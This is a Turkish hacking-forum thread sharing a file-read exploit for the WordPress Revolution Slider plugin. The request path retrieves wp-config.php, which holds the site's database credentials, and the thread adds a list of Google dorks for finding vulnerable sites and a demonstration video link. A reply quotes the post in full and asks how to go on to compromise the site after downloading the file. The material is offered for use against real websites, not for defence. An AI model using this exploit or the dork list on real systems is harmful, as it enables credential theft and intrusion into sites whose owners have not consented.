Wordpress DB Bilgisi Exploit (Videolu)

N

nonPhixionn

Üye
4 Şub 2015
115
0
C++ İçinden
Öncelikle yeni çıkmış bir açık degil bulması kolay kullanması zor bir açıktır,video çekmedeki asıl amaç exploit nasıl birşey ve nasıl kullanılır onu göstermeye çalıştım..İnşallah başka videolara daha iyi exploitler anlatırız..
-----------------------------

Exploit = /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Dork's =

Kod: 
inurl: /wp-content/plugins/revslider/
# Google Dork: "Index of" +/wp-content/themes/cuckootap/
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/
# Google Dork: "Index of" +/wp-content/themes/ultimatum
# Google Dork: "Index of" +/wp-content/themes/medicate/
# Google Dork: "Index of" +/wp-content/themes/Centum/
# Google Dork: "Index of" +/wp-content/themes/Avada/
# Google Dork: "Index of" +/wp-content/themes/striking_r/
# Google Dork: "Index of" +/wp-content/themes/beach_apollo/

Video URL: https://vimeo.com/119647356

Not: TIKLA konusunda 'AdrenaLiN başkan anlatmış bende videosunu ekledim :)
 
Son düzenleme:
madalok12

madalok12

Katılımcı Üye
1 Ocak 2015
592
0
nonPhixionn' Alıntı:
Öncelikle yeni çıkmış bir açık degil bulması kolay kullanması zor bir açıktır,video çekmedeki asıl amaç exploit nasıl birşey ve nasıl kullanılır onu göstermeye çalıştım..İnşallah başka videolara daha iyi exploitler anlatırız..
-----------------------------

Exploit = /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Dork's =

Kod: 
inurl: /wp-content/plugins/revslider/
# Google Dork: "Index of" +/wp-content/themes/cuckootap/
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/
# Google Dork: "Index of" +/wp-content/themes/ultimatum
# Google Dork: "Index of" +/wp-content/themes/medicate/
# Google Dork: "Index of" +/wp-content/themes/Centum/
# Google Dork: "Index of" +/wp-content/themes/Avada/
# Google Dork: "Index of" +/wp-content/themes/striking_r/
# Google Dork: "Index of" +/wp-content/themes/beach_apollo/
Video URL: https://vimeo.com/119647356

Not: TIKLA konusunda 'AdrenaLiN başkan anlatmış bende videosunu ekledim :)
Genişletmek için tıkla ...
İyide sadece db'yi indirip bırakmışsın nasıl hackleneceğini nasıl bulucaz?
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.